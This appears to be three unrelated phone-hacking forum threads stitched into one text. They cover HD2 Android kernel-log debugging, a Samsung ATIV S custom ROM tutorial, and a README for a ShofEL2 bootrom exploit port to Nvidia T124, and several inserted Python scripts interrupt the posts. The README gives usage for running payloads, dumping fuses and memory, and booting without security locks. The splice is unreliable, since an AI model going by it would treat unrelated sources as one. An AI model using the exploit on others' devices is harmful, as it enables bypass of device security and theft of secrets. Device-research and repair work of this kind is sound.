[ 54.327804] 1f40: 297f5aac b46c40c0 40c61004 00000000 00000000 c572d920 000012c0 0000b5d0
[ 54.327829] 1f60: c6b51fa4 c6b51f70 c0107d9c c0107b80 00000000 00000000 00000008 00000001
[ 54.327854] 1f80: 00000000 0000b450 ab70aa89 000012c0 00000004 c006a144 00000000 c6b51fa8
[ 54.327879] 1fa0: c0069fc0 c0107d64 0000b450 ab70aa89 00000013 0000b5d0 000012c0 ab70a697
[ 54.327904] 1fc0: 0000b450 ab70aa89 000012c0 00000004 00100000 a9d1b8e5 40207000 0000d018
[ 54.327929] 1fe0: ab70c6cc 40306d58 ab7073bf afe0c95c 00000010 00000013 581a447b 32081c20
[ 54.327946] Backtrace:
[ 54.327974] [<c006d7b0>] (__bug+0x0/0x2c) from [<c0087c4c>] (pcm_write+0x118/0x1e0)
[ 54.328024] [<c0087b34>] (pcm_write+0x0/0x1e0) from [<c0107c2c>] (vfs_write+0xb8/0x164)
[ 54.328054] [<c0107b74>] (vfs_write+0x0/0x164) from [<c0107d9c>] (sys_write+0x44/0x70)
[ 54.328072] r8:0000b5d0 r7:000012c0 r6:c572d920 r5:00000000 r4:00000000
[ 54.328120] [<c0107d58>] (sys_write+0x0/0x70) from [<c0069fc0>] (ret_fast_syscall+0x0/0x2c)
[ 54.328138] r8:c006a144 r7:00000004 r6:000012c0 r5:ab70aa89 r4:0000b450
[ 54.328179] Code: e1a01000 e59f000c eb0b7ad6 e3a03000 (e5833000)
[ 54.328200] ---[ end trace 7e446c20b8bf60cf ]---
[ 54.328216] Kernel panic - not syncing: Fatal exception
[ 54.328228] Backtrace:
[ 54.328277] [<c006dad4>] (dump_backtrace+0x0/0x110) from [<c034c1e8>] (dump_stack+0x18/0x1c)
[ 54.328296] r7:c006d7d4 r6:c6b51d67 r5:c006d7d2 r4:c0450820
[ 54.328337] [<c034c1d0>] (dump_stack+0x0/0x1c) from [<c034c250>] (panic+0x64/0x13c)
[ 54.328364] [<c034c1ec>] (panic+0x0/0x13c) from [<c006de64>] (die+0x280/0x2c8)
[ 54.328381] r3:00000001 r2:c6b51d38 r1:0000c846 r0:c03cab72
[ 54.328426] [<c006dbe4>] (die+0x0/0x2c8) from [<c006fa4c>] (__do_kernel_fault+0x6c/0x7c)
[ 54.328456] [<c006f9e0>] (__do_kernel_fault+0x0/0x7c) from [<c006fc60>] (do_page_fault+0x204/0x220)
[ 54.328475] r7:c7a09370 r6:c6b51e90 r5:c7bf89a0 r4:00000000
[ 54.328515] [<c006fa5c>] (do_page_fault+0x0/0x220) from [<c0069304>] (do_DataAbort+0x3c/0x9c)
[ 54.328542] [<c00692c8>] (do_DataAbort+0x0/0x9c) from [<c0069aac>] (__dabt_svc+0x4c/0x60)
[ 54.328562] Exception stack(0xc6b51e90 to 0xc6b51ed8)
[ 54.328579] 1e80: 0000004d 0000a043 00000000 00000000
[ 54.328604] 1ea0: c6b51f08 c7bf89a0 c579f440 00000000 00000000 c6b50000 0000b5d0 c6b51ee4
[ 54.328627] 1ec0: c6b51e10 c6b51ed8 c009cfd0 c006d7d0 60000013 ffffffff
[ 54.328643] r8:00000000 r7:00000000 r6:c579f440 r5:c6b51ec4 r4:ffffffff
[ 54.328687] [<c006d7b0>] (__bug+0x0/0x2c) from [<c0087c4c>] (pcm_write+0x118/0x1e0)
[ 54.328713] [<c0087b34>] (pcm_write+0x0/0x1e0) from [<c0107c2c>] (vfs_write+0xb8/0x164)
[ 54.328741] [<c0107b74>] (vfs_write+0x0/0x164) from [<c0107d9c>] (sys_write+0x44/0x70)
[ 54.328759] r8:0000b5d0 r7:000012c0 r6:c572d920 r5:00000000 r4:00000000
[ 54.328803] [<c0107d58>] (sys_write+0x0/0x70) from [<c0069fc0>] (ret_fast_syscall+0x0/0x2c)
[ 54.328822] r8:c006a144 r7:00000004 r6:000012c0 r5:ab70aa89 r4:0000b450
and it's clear that the error is caused by the sound output code; we even know the place where it crashed: "pcm_out.c:188". So we can go and look around.
It gives a much better chance to fix the problem and make Android stable.
For example, the source of the "mysterious" SOD problem can be detected via kernel logs.
It doesn't appear randomly, it appears only under some condition. It's nice if testers are able to find this condition and provide kernel logs to developers.
I will expand this message later with more information.
TBD
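As an added example (my own code, not Cotulla's and not part of this thread), here is a small Python triage script for ARM oops text of the kind captured with dmesg: it pulls out the BUG() location, the kernel version, the process, the faulting instruction word, and rebuilds the call chain from the "callee from caller" backtrace lines, ignoring the second backtrace that panic() itself prints. The sample input is a trimmed copy of the pcm_out.c oops quoted above; the read/write decode of the "Oops: 817" code uses the ARM32 fault status register's write bit (bit 11), which is a property of the kernel's fault reporting, not something stated in this thread.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: a trimmed copy of the pcm_out.c oops quoted in the post above,
# keeping only the lines a first-pass triage needs, plus the start of the second
# backtrace that panic() prints (to show that it is ignored).
SAMPLE_OOPS = """\
[   54.323889] kernel BUG at arch/arm/mach-msm/qdsp6_10/pcm_out.c:188!
[   54.323918] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[   54.323981] Internal error: Oops: 817 [#1] PREEMPT
[   54.324034] CPU: 0    Not tainted  (2.6.32.9-38066-g672726a-dirty #168)
[   54.327669] Process Playback Thread (pid: 1216, stack limit = 0xc6b502f0)
[   54.327946] Backtrace:
[   54.327974] [<c006d7b0>] (__bug+0x0/0x2c) from [<c0087c4c>] (pcm_write+0x118/0x1e0)
[   54.328024] [<c0087b34>] (pcm_write+0x0/0x1e0) from [<c0107c2c>] (vfs_write+0xb8/0x164)
[   54.328054] [<c0107b74>] (vfs_write+0x0/0x164) from [<c0107d9c>] (sys_write+0x44/0x70)
[   54.328072] r8:0000b5d0 r7:000012c0 r6:c572d920 r5:00000000 r4:00000000
[   54.328120] [<c0107d58>] (sys_write+0x0/0x70) from [<c0069fc0>] (ret_fast_syscall+0x0/0x2c)
[   54.328179] Code: e1a01000 e59f000c eb0b7ad6 e3a03000 (e5833000)
[   54.328216] Kernel panic - not syncing: Fatal exception
[   54.328228] Backtrace:
[   54.328277] [<c006dad4>] (dump_backtrace+0x0/0x110) from [<c034c1e8>] (dump_stack+0x18/0x1c)
"""

FSR_WRITE = 1 << 11  # ARM32 fault status register: bit 11 set means the access was a write

LINE_RE = re.compile(r"^\[\s*\d+\.\d+\]\s*(?P<msg>.*)$")
BUG_RE = re.compile(r"kernel BUG at (?P<file>\S+):(?P<line>\d+)!")
FAULT_RE = re.compile(r"Unable to handle kernel (?P<kind>.+) at virtual address (?P<addr>[0-9a-f]+)")
OOPS_RE = re.compile(r"Internal error: Oops: (?P<fsr>[0-9a-f]+) \[#\d+\]")
CPU_RE = re.compile(r"CPU: \d+\s+(?P<taint>.+?)\s+\((?P<ver>\S+) #\d+\)")
PROC_RE = re.compile(r"Process (?P<name>.+?) \(pid: (?P<pid>\d+), stack limit")
FRAME_RE = re.compile(r"\[<[0-9a-f]+>\] \((?P<callee>[^+]+)\+0x[0-9a-f]+/0x[0-9a-f]+\) "
                      r"from \[<[0-9a-f]+>\] \((?P<caller>[^+]+)\+0x[0-9a-f]+/0x[0-9a-f]+\)")
CODE_RE = re.compile(r"Code: .*\((?P<fault>[0-9a-f]{8})\)")
PANIC_RE = re.compile(r"Kernel panic - not syncing: (?P<why>.*)")


@dataclass
class OopsReport:
    bug_file: Optional[str] = None
    bug_line: Optional[int] = None
    fault_kind: Optional[str] = None
    fault_addr: Optional[int] = None
    fsr: Optional[int] = None
    kernel_version: Optional[str] = None
    process: Optional[str] = None
    pid: Optional[int] = None
    call_chain: List[str] = field(default_factory=list)  # outermost caller first
    faulting_insn: Optional[str] = None
    panic: Optional[str] = None

    @property
    def access(self) -> Optional[str]:
        """'read' or 'write', decoded from the Oops code (which is the FSR value)."""
        if self.fsr is None:
            return None
        return "write" if self.fsr & FSR_WRITE else "read"


def parse_oops(text: str) -> OopsReport:
    rep = OopsReport()
    frames: List[Tuple[str, str]] = []  # (callee, caller) pairs of the first backtrace
    in_backtrace = False
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        msg = m.group("msg") if m else raw
        if msg.startswith("Backtrace:"):
            in_backtrace = not frames  # panic() prints a second one; keep only the first
            continue
        if msg.startswith("Code:"):
            in_backtrace = False
        if in_backtrace:
            f = FRAME_RE.search(msg)
            if f:  # register-dump lines between frames carry nothing for triage
                frames.append((f["callee"], f["caller"]))
            continue
        if m := BUG_RE.search(msg):
            rep.bug_file, rep.bug_line = m["file"], int(m["line"])
        elif m := FAULT_RE.search(msg):
            rep.fault_kind, rep.fault_addr = m["kind"], int(m["addr"], 16)
        elif m := OOPS_RE.search(msg):
            rep.fsr = int(m["fsr"], 16)
        elif m := CPU_RE.search(msg):
            rep.kernel_version = m["ver"]
        elif m := PROC_RE.search(msg):
            rep.process, rep.pid = m["name"], int(m["pid"])
        elif m := CODE_RE.search(msg):
            rep.faulting_insn = m["fault"]
        elif m := PANIC_RE.search(msg):
            rep.panic = m["why"]
    if frames:
        # Each line reads "callee from caller" and consecutive lines chain together,
        # so the innermost function is the first callee and the rest are its callers.
        innermost_first = [frames[0][0]] + [caller for _, caller in frames]
        rep.call_chain = list(reversed(innermost_first))
    return rep


def triage_line(rep: OopsReport) -> str:
    """One-line summary of the kind a bug report to the developer should carry."""
    where = f"{rep.bug_file}:{rep.bug_line}" if rep.bug_file else "no BUG() line"
    addr = f"{rep.fault_addr:#010x}" if rep.fault_addr is not None else "?"
    return (f"{rep.kernel_version}: {rep.fault_kind} ({rep.access} at {addr}) in "
            f"'{rep.process}' pid {rep.pid}; {where}; {' -> '.join(rep.call_chain)}")


if __name__ == "__main__":
    print(triage_line(parse_oops(SAMPLE_OOPS)))
```

On the sample this reports a write to address 0, which agrees with the faulting word e5833000 (a store through r3, which is 0 in the register dump above): the old ARM BUG() deliberately writes to a NULL pointer, so the "NULL pointer dereference" here is the BUG() itself, and the line to look at is pcm_out.c:188, not the fault address.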
I'm in.. I'll help all I can...
On behalf of Chinese users, I thank you. I will help where I can.
Sent from my HTC HD2 using XDA App
Cotulla, do not forget about russian forum 4pda.ru, are ready to help with tests!
got it |o|
han shui ...
Cotulla, you are the THE MAN! Thanks for all your hard work.
I'll be happy to report any bugs with logs... as soon as someone explains how to create the log or where it is located etc
Hopefully that's what this below means
Cotulla said:
I will expand this message later with more information.
TBD
I've been reading IRC logs and I don't know about developing, but I can test and send logs; you can count on me. There are so many builds out there, but the most important thing is testing and fixing. Thank you Cotulla for your hard work.
I'm also in.. so I need the kernel logger from cotulla.pp.ru, right?
Sent from my HD2 using XDA app
20mihalko said:
I'm also in.. so I need the kernel logger from cotulla.pp.ru, right?
Sent from my HD2 using XDA app
just took a look through cotulla.pp.ru.... can't seem to find a kernel logger.... got a direct link?
Would like to help if possible.. however, I'm not sure where do we get the kernel log? Is the log currently available for extraction and submission?
Sent from my HTC Leo using XDA App
i think he will be posting that info soon...
I help if i can too !!
Greets from Germany
Anything to help out the development.
I'm using Android on a day-by-day basis now, so there's bound to be stuff I could report.
Come on guys, you won't help developers if you just write "ok i will help you". Nobody needs that; besides, this thread is going to be confusing. Please help Cotulla and provide him your logs.
How to create logs:
Download the tool Andlog on Cotullas Homepage: http://cotulla.pp.ru/leo/Android/andlog.exe
After you detect problems in Android (Sleep of Death or something) you need to reset your device with the red reset button on the back of your HD2.
Don't remove the battery!!!
Once WM is booted you can run andlog.exe and it will create an andlog.txt file on the root of your device. Be aware that Andlog doesn't show any message! (like CLRCAD)
Paste the content here: http://pastebin.com
and link it here in this forum with detailed information
Ok i will start with providing logs:
Got SOD while LEO was in standby. Waited some seconds but the screen stayed black.
Log: http://pastebin.com/DPPAd6ep
I am ready for testing anything
Sent from my HTC HD2 using Xda application
OK, I've got mine ready for issues.. I will post them when I find them
moorgogel said:
Come on guys, you won't help developers if you just write "ok i will help you". Nobody needs that; besides, this thread is going to be confusing. Please help Cotulla and provide him your logs.
How to create logs:
....
ahhh, good man. Thank you.
edit:
I know this should probably be common sense but just to make it clear to everyone who wants to help...
Should we report all (even minor/trivial) bugs or just report major bugs ( such as SOD) for now?
cotulla? moorgogel?
moorgogel, nice guide, thanks!
Another method (for non-fatal errors): it's possible to use ADB from the Android SDK.
Just put in the command line
Code:
adb shell dmesg > dmesg.txt
and u get the current kernel log in dmesg.txt.
I know this should probably be common sense but just to make it clear to everyone who wants to help...
Should we report all (even minor/trivial) bugs or just report major bugs ( such as SOD) for now?
Basically it's not obvious.
Some bugs won't show anything in the log. For example if BT isn't working in some Android build, the kernel log won't show anything.
May I ask, is this only for reporting SODs? I guess I can't report anything when the camera crashes in Android, for example. Btw I have never got SODs. I really have the idea that it is caused by a slow SD card. Edit: for other things I have to use adb.

[TUT] How to make a custom ROM for Samsung ATIV S

This tutorial is about making a custom ROM for ATIV S or any other Samsung WP8 phone.
Samsung ROM files:
.wp8 - main file with OS and boot
.csc - file with regional info
.smd - ROM for WP7 devices
All those files have (almost) the same format; I call it SMD. Old .smd files can be unpacked using this instruction; back in the day smd-tool was made for them, but the format has changed slightly. This process was only tested on ATIV S.
CSC
.csc files aren't flashed to device, those are just containers for MBN files. And MBN files are copied to DPP during flashing process.
AS ALWAYS YOU ARE MAKING THIS ON YOUR OWN RISK! AND GOOD LUCK
Tutorial contents
Basic:
Making custom CSC (.mbn)
Extracting SMD
How to work with "packed" partitions
What to edit in ROM
Packing SMD
Advanced:
Making CSC from MBN
Making developer ROM
Making custom CSC (.mbn)
Software
sam-tools
Any tool for mounting drive images (OSFMount)
MBN Creator
MBN Creator is a kitchen itself. It has some limitations, but creating MBNs with MBN Creator is very easy. This method is described in the end.
Unpacking CSC files
Official CSCs come in .csc files. Use smd-tool to unpack file.csc to csc_dump folder:
Code:
smd-tool /u file.csc /d csc_dump
Now mount DPP.bin and copy CSC.mbn file from it. Unmount DPP then.
Code:
\Samsung\CSC\CSC.mbn
Now use mbn-tool to extract files from csc.mbn to mbn_dump folder:
Code:
mbn-tool /u csc.mbn /d mbn_dump
Every folder in mbn_dump is for one CSC code. There are 4 files inside every folder (AUT, for example):
SS_AUT.ini - init values for the welcome screen (first boot). Language, region, timezone and carrier.
SS_AUT.reg - registry file.
SS_AUT_AppInstall.provxml - PROVXML file with (and only with) app install instructions.
SS_AUT_CSC.xml - PROVXML file.
Warning! There is a size limit of ~50KB for any file. The MBN itself is limited by DPP free space.
Packing MBN
Code:
mbn-tool /p mbn_dump /f my.mbn /ver I8750OXXCMK2 /subver OXX
CSC version (I8750OXXCMK2) should be greater or equal to your ROM version. Otherwise it will be ignored. DOC2 CSC will work on CMK2 ROM, but not vice versa!
Warning! Official DNI and DOC ROMs don't support custom MBNs.
Using MBN Creator
You can apply predefined tweaks from 1st tab or add your own directly into files. Last tab contains MBN file properties. MBN Creator is limited to only one CSC code.
You can check your work in
Code:
MBN Creator temp
folder. Output file is CSC.mbn.
Flashing MBN with MBN Creator
Reboot phone into Download Mode
Connect to PC and install drivers
Copy or create CSC.mbn file
Press Flash, Scan
Choose CSC code and press Flash
All done. Reset phone. Perform HR if MBN didn't apply.
Warning! MBN Creator can't flash files larger than 64KB.
Flashing MBN with stock Downloader
Open .wp8 and .mbn files
Check "Select" and uncheck everything but "CSC"
If flasher asks you about something click NO
Extracting SMD
Software
sam-tools
Any tool for mounting drive images (OSFMount)
Unpack
Unpack file.wp8 to dump folder
Code:
smd-tool /u file.wp8 /d dump
Output example:
Code:
Partition name NAND off N size ROM off R size Part. ID Type Status
GPT 00000000 00000800 00200C00 0000FC00 00000000 00000000 [ OK ]
SECURE 00000800 00000800 00210800 00000400 00000001 00000000 [ OK ]
DPP 00001000 00004000 00210C00 00800000 00000002 00000000 [ OK ]
SBL1 00008000 00000BB7 00A10C00 0016A400 00000003 00000000 [ OK ]
SBL2 P 00009000 00000BB7 00B7B000 0016A400 00000004 00000000 [ OK ]
SBL3 0000A000 00000FFF 00CE5400 001F8000 00000005 00000000 [ OK ]
UEFI S 0000B000 00001387 00EDD400 00207C00 00000006 00000000 [ OK ]
RPM 0000D000 000003E7 010E5000 0006E400 00000007 00000000 [ OK ]
TZ 0000E000 000003E7 01153400 0006E400 00000008 00000000 [ OK ]
WINSECAPP 0000F000 000003FF 011C1800 0007E000 00000009 00000000 [ OK ]
PLAT 0001A000 00003FFF 0123F800 00742800 0000000A 00000000 [ OK ]
EFIESP 00020000 0001FFFF 01982000 0094A400 0000000B 00000000 [ OK ]
MMOS 00046000 0002403F 022CC400 0440B800 0000000C 00000000 [ OK ]
MainOS 0006C000 004B295F 066D7C00 61F20000 0000000D EACCE221 [ OK ]
Data 00520000 01838FFF 685F7C00 02920000 0000000E EACCE221 [ OK ]
Output files:
header - header of SMD
GPT - partition table
PLAT, EFIESP, MMOS - partitions with FAT file system
MainOS and Data - NTFS partitions
other files - bootloader and other low level stuff
The DPP partition isn't flashed to the phone. In the wp8 file it's empty.
EACCE221 means that the partition is packed.
How to work with "packed" partitions
Software
sam-tools
Any tool for mounting drive images (OSFMount)
Unpack
Large zero areas are cut out of those partitions. image-rebase can restore such files.
Code:
image-rebase /u MainOS.bin /o MainOS.img
You can now mount and edit MainOS.img.
Warning! The Data partition is very large and almost empty.
Pack
First of all slice image file:
Code:
image-rebase /s MainOS.img /z 2048
This command will cut off zero areas larger than 2048 sectors (1MB).
MainOS.img.xml is a template file.
Now you can glue files together using template:
Code:
image-rebase /p MainOS.bin /t MainOS.img.xml
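As an added illustration of what the /s and /p steps do (my own simplified Python, not image-rebase and not its MainOS.img.xml format): every run of all-zero sectors at least as long as the threshold is dropped from the packed file and its position recorded in a template, and the template puts the zeros back. The 512-byte sector size follows from the tutorial's "2048 sectors (1MB)"; the template here is a plain dict, and the sample image is constructed.

```python
SECTOR = 512  # 2048 sectors = 1MB in the tutorial, so sectors are 512 bytes


def find_holes(img: bytes, min_zero_sectors: int):
    """Return [(start_sector, n_sectors)] for each all-zero run long enough to drop."""
    n = len(img) // SECTOR
    holes, i = [], 0
    while i < n:
        if any(img[i * SECTOR:(i + 1) * SECTOR]):  # non-zero sector: keep scanning
            i += 1
            continue
        j = i
        while j < n and not any(img[j * SECTOR:(j + 1) * SECTOR]):
            j += 1
        if j - i >= min_zero_sectors:  # short zero runs are cheaper to keep inline
            holes.append((i, j - i))
        i = j
    return holes


def slice_image(img: bytes, min_zero_sectors: int):
    """Like `image-rebase /s`: returns (packed_bytes, template).

    template = {"size": original length, "chunks": [(offset_in_image, length), ...]}
    where the chunks are the byte ranges present in packed_bytes, in order."""
    if len(img) % SECTOR:
        raise ValueError("image must be a whole number of sectors")
    template = {"size": len(img), "chunks": []}
    packed = bytearray()
    pos = 0
    for start, length in find_holes(img, min_zero_sectors):
        if start > pos:
            template["chunks"].append((pos * SECTOR, (start - pos) * SECTOR))
            packed += img[pos * SECTOR:start * SECTOR]
        pos = start + length
    n = len(img) // SECTOR
    if pos < n:
        template["chunks"].append((pos * SECTOR, (n - pos) * SECTOR))
        packed += img[pos * SECTOR:]
    return bytes(packed), template


def rebase_image(packed: bytes, template: dict) -> bytes:
    """Like `image-rebase /u` / `/p` with a template: re-inflate the zero areas."""
    out = bytearray(template["size"])  # all zeros; chunks overwrite the data parts
    off = 0
    for dst, length in template["chunks"]:
        out[dst:dst + length] = packed[off:off + length]
        off += length
    if off != len(packed):
        raise ValueError("packed data does not match template")
    return bytes(out)


def build_sample_image() -> bytes:
    """Constructed 23-sector image: data, a 3-sector hole (kept at threshold 4),
    data, an 8-sector hole (dropped), data, a trailing 5-sector hole (dropped)."""
    def data(n, v):
        return bytes([v]) * (n * SECTOR)

    def zeros(n):
        return bytes(n * SECTOR)

    return data(4, 0x5A) + zeros(3) + data(1, 0xC3) + zeros(8) + data(2, 0x3C) + zeros(5)


if __name__ == "__main__":
    img = build_sample_image()
    packed, tmpl = slice_image(img, 4)
    print(len(img), "->", len(packed), "bytes; chunks:", tmpl["chunks"])
    print("round trip ok:", rebase_image(packed, tmpl) == img)
```

The threshold matters in the same way as the /z value on the page: a run shorter than it stays inline, so the sample's 3-sector hole is carried in the packed file while the 8- and 5-sector holes are reconstructed from the template.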
What to edit in ROM
CSCMgr
This service applies the MBN file. The idea is to downgrade it to the CMK2 (GDR3) version. To do so, replace these files:
system32\CSCMgr.dll
system32\CSCMgrSvc.dll
system32\drivers\CSCMgrSvc.dll (yes, it's a copy)
FCRouter
This service is used by Samsung system tools to perform actions with high privileges. Files:
system32\FCRouter.dll
system32\FCRouterProxy.dll
system32\drivers\FCRouter.dll
system32\drivers\FCDriver.dll
Registry hives
Code:
system32\config
You can edit those hives as you want. But HR will destroy all your work.
OSRepack
It is a simple tool to work with packages on mounted partitions. Available here.
SDelete
There is a tool called SDelete which can fill all free space on a drive with zeros.
Code:
sdelete -z X:
Very useful for non-developer ROMs.
Packing SMD
Software
sam-tools
Hex editor (HxD)
Pack MainOS image
Code:
image-rebase /s MainOS.img /z 2048
image-rebase /p MainOS.bin /t MainOS.img.xml
Prepare SMD header
It's not really a header but the first part of the file. This file can be used as a template for your later work. It contains all partitions except MainOS.
Code:
smd-tool /info file.wp8
This command will give you some info about SMD file structure. Open it in hex editor and copy all data up to MainOS ROM offset to a new file. Add Data.bin to this new file.
There are some structures at the start of file. For example:
4D 61 69 6E 4F 53 00 00 00 00 00 00 00 00 00 00
00 C0 06 00 5F 29 4B 00 00 7C FF 08 00 0E AD 61
1F 1F 1F 1F 00 00 00 00 21 E2 CC EA 00 00 00 00
2B C2 5E C9 6A 2F 0B E1 6F 1C 95 FC 49 FF E9 FD
Start and length are colored.
Warning! Those numbers are little endian (12345678 = 78 56 34 12)
Replace Data Start with MainOS Start. You can use Ctrl+C & Ctrl+B (copy and paste with replace).
Replace MainOS Start with length of this (template) file.
Save file.
Adding MainOS
Add MainOS.img to your template.
Replace MainOS Length with length (in bytes) of MainOS.bin file.
Replace 16 bytes at offset 0x50 with zeros.
Compute the MD5 hash of the file (HxD can do it) and write it at 0x50 (^C & ^B).
Save this file as .wp8
You can check numbers you entered with following command:
Code:
smd-tool /info custom.wp8
Warning! This .wp8 file can only be flashed with Downloader v3.54
Making CSC from MBN
Software
Hex editor (HxD)
Pack
Open CSC file in HxD.
At 0x00A00C00 it has MBN file contents.
Replace it with your MBN and fill rest of the CSC with zeros.
Warning! This file can't be unpacked with this instruction because the FAT is broken. You can unpack it manually.
Correct the MD5 as you did for the WP8 file.
Warning! This CSC can fool Downloader but not the phone. The new CSCMgr will still ignore a custom MBN.
Making developer ROM
Such ROMs can be directly mounted with OSFMount.
This command will pseudo-slice MainOS.img:
Code:
image-rebase /s MainOS.img /z 4000000
The entire partition will be in one piece.
If you pack the SMD with this file you can mount it and edit it without repacking the SMD.
In OSFMount enter offset equal to MainOS ROM offset + 0x1000.
Don't forget to recalculate MD5 after edit.
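As an added example serving the "Prepare SMD header", "Adding MainOS", "Making CSC from MBN" and "Making developer ROM" steps (my own Python, not sam-tools), here is a decoder for the 64-byte structure shown in the hex dump above and a checker for the whole-file MD5 at 0x50. The field layout is an assumption inferred from that dump: after the 16-byte name, the first two little-endian dwords equal the MainOS "NAND off" and "N size" in the smd-tool table, so the next two are read as ROM offset and ROM size, and EACCE221 appears where the table shows the packed marker; the remaining bytes are kept opaque. The MD5 procedure follows the tutorial: the 16 bytes at 0x50 are zeroed, the file is hashed, and the digest is written there. The sample file is constructed; only the position of the MD5 slot follows the page.

```python
import hashlib
import struct

# Assumed layout of one 64-byte partition entry (inferred from the hex dump on the page):
# 16-byte name, then NAND off / N size / ROM off / R size as little-endian dwords,
# 4 opaque bytes, 4 zero bytes, the type marker, 4 zero bytes, 16 opaque trailing bytes.
ENTRY_FMT = "<16s4I4s4sI4s16s"
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)  # 64
PACKED_TYPE = 0xEACCE221                 # smd-tool shows this for packed partitions
MD5_OFFSET = 0x50                        # the tutorial's location of the file MD5

# The 64 bytes shown in the tutorial ("MainOS" entry), copied from the page.
SAMPLE_ENTRY = bytes.fromhex(
    "4D61696E4F5300000000000000000000"
    "00C006005F294B00007CFF08000EAD61"
    "1F1F1F1F0000000021E2CCEA00000000"
    "2BC25EC96A2F0BE16F1C95FC49FFE9FD"
)


def parse_entry(entry: bytes) -> dict:
    """Decode one partition entry into named fields (little-endian, as the page notes)."""
    if len(entry) != ENTRY_SIZE:
        raise ValueError(f"entry must be {ENTRY_SIZE} bytes")
    name, nand_off, nand_size, rom_off, rom_size, unk, _, ptype, _, tail = struct.unpack(ENTRY_FMT, entry)
    return {
        "name": name.rstrip(b"\0").decode("ascii"),
        "nand_off": nand_off,
        "nand_size": nand_size,
        "rom_off": rom_off,
        "rom_size": rom_size,
        "unknown": unk.hex(),      # meaning not stated on the page
        "type": ptype,
        "packed": ptype == PACKED_TYPE,
        "tail": tail.hex(),        # meaning not stated on the page
    }


def find_entry(data: bytes, name: str) -> dict:
    """Locate the entry whose 16-byte name field matches `name` and decode it."""
    key = name.encode("ascii").ljust(16, b"\0")
    pos = data.find(key)
    if pos < 0 or pos + ENTRY_SIZE > len(data):
        raise ValueError(f"no entry named {name!r}")
    return parse_entry(data[pos:pos + ENTRY_SIZE])


def compute_file_md5(data: bytes) -> bytes:
    """MD5 over the file with the 16-byte slot at 0x50 treated as zeros."""
    scratch = bytearray(data)
    scratch[MD5_OFFSET:MD5_OFFSET + 16] = bytes(16)
    return hashlib.md5(scratch).digest()


def verify_file_md5(data: bytes) -> bool:
    """True if the digest stored at 0x50 matches the rest of the file."""
    return data[MD5_OFFSET:MD5_OFFSET + 16] == compute_file_md5(data)


def stamp_file_md5(data: bytes) -> bytes:
    """Return a copy with a fresh digest written at 0x50 (the tutorial's last step)."""
    out = bytearray(data)
    out[MD5_OFFSET:MD5_OFFSET + 16] = compute_file_md5(data)
    return bytes(out)


def build_sample_file() -> bytes:
    """Constructed stand-in for a .wp8 file: an arbitrary prefix up to 0x50, the MD5
    slot, the MainOS entry from the page, and some payload bytes, then stamped."""
    prefix = b"CONSTRUCTED-SMD-SAMPLE".ljust(MD5_OFFSET, b"\0")
    body = prefix + bytes(16) + SAMPLE_ENTRY + bytes([0xAA]) * 0x200
    return stamp_file_md5(body)


if __name__ == "__main__":
    blob = build_sample_file()
    e = find_entry(blob, "MainOS")
    print(f"{e['name']}: NAND off {e['nand_off']:#010x}, N size {e['nand_size']:#010x}, "
          f"ROM off {e['rom_off']:#010x}, R size {e['rom_size']:#010x}, packed={e['packed']}")
    print("MD5 ok:", verify_file_md5(blob))
```

Running verify_file_md5 on a repacked file is the check to do before flashing: any byte changed after stamping (the developer-ROM edits the last section mentions, for instance) makes it return False until stamp_file_md5 is run again.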
OMG, WOLF! People tell me that my tutorials are too long. But you are a true match for me!! :highfive:
Congrats on this great achievement! :victory:
Wow! Huge thanks for rewriting these tutorials in English; I wasn't expecting you to do it so soon! Can't wait to play around and to see what others come up with.
I play around with the replacement of files FC Router + WP8 Diag on my GT-I8750 (from the SM-W750V, SPH-I800, SGH-I187, SGH-T899M), in the end everything works.
Powered mode Smart Download.
so it could be possible to use the ATIV S version of CSCMgr on SE. And SE would then have custom MBN.
Yea, that's what I gathered from the info as well. Unfortunately I won't have time to try this out for another 4-7 days but I'll let you know if I do. And if you (or anyone else) feels like whipping it up and you need someone to try it, shoot me a PM.
Added info about sdelete and OSRepack to "What to edit in ROM"
I have an idea to record full process of ROM making and upload it on Youtube. Will it be useful?
Added poll.

Fusee Gelee / ShofEL2 exploit port for the T124 (Shield Tablet). AKA Dump SBK

I know that this comes a little bit late but this device is still a good machine...
This could potentially be used to boot bricked devices. Unfortunately further work would be required since the Shield Tablet uses a private key (not on the device) to sign the bootloader and, if I understand correctly, fuses and nvflash cmds. Probably it could be possible to boot into Linux implementing something like shofel2 does and reflash the emmc from it.... at the same time I don't have a bricked device to verify this.
My main aim with this was to learn about SoC bootchain/baremetal and related protocols and maybe boot clean Debian with a clean U-Boot.... I'm still pending on the second but I really don't know how long it will take me... I don't have that much spare time and this took me almost a year and a half to earn the knowledge to reach this point...
ShofEL2 for T124
This is a Fusee Gelee / ShofEL2 exploit port for the Nvidia T124 (a.k.a Jetson TK1, Shield K1, etc).
Currently this code allows you to download and execute a payload to the T124, dump the fuses and memory and boot the BCT without applying the locks.
Most of my code is based on the original ShofEL2 code and Katherine Temkin's research, so I cannot take that much credit for this.
See the original fail0verflow blog post: https://fail0verflow.com/blog/2018/shofel2/ See additional info at the original Katherine Temkin github: https://github.com/Qyriad/fusee-launcher/blob/master/report/fusee_gelee.md
Obligatory disclaimer
This code is provided without any warranty, use under your own responsibility.
Usage
You need an arm-*-eabi toolchain. You can use Crosstool-ng to compile it.
Build the loader and payloads:
$ cd ShofEL2-for-T124
$ make
Usage
$ ./shofel2_t124 ( MEM_DUMP | READ_FUSES | BOOT_BCT | PAYLOAD ) [options]
$ MEM_DUMP address length out_file -> Dumps "length" bytes starting from "address" to "out_file".
$ READ_FUSES out_file -> Dumps the T124 fuses to "out_file" and shows them in the console.
$ BOOT_BCT -> Boots the BCT without applying locks.
$ PAYLOAD payload.bin [arm|thumb] -> Boots "payload.bin"; the entry mode can be specified (thumb by default).
Interesting facts (maybe some of them wrong):
RCM loads the payload to IRAM at 0x4000E000 (described on tegrarcm source code).
RCM cmd format is slightly different. RCM cmd header length is 0x284 bytes, but the first 4 bytes still contain the RCM cmd length.
RCM cmd length restrictions are different from the X1 bootrom:
Bulk transfers need to be a multiple of 0x1000 to ensure the whole USB buffer is used.
RCM cmd length minus 0x284 (header length) must be a multiple of 0x10 (which means the RCM cmd length needs to end in 4).
RCM cmd min length is 0x404 bytes. Due to the previous condition, the minimum length would be 0x1004.
RCM cmd length cannot exceed the available IRAM for the payload (from 0x4000E000 till 0x4003FFFF).
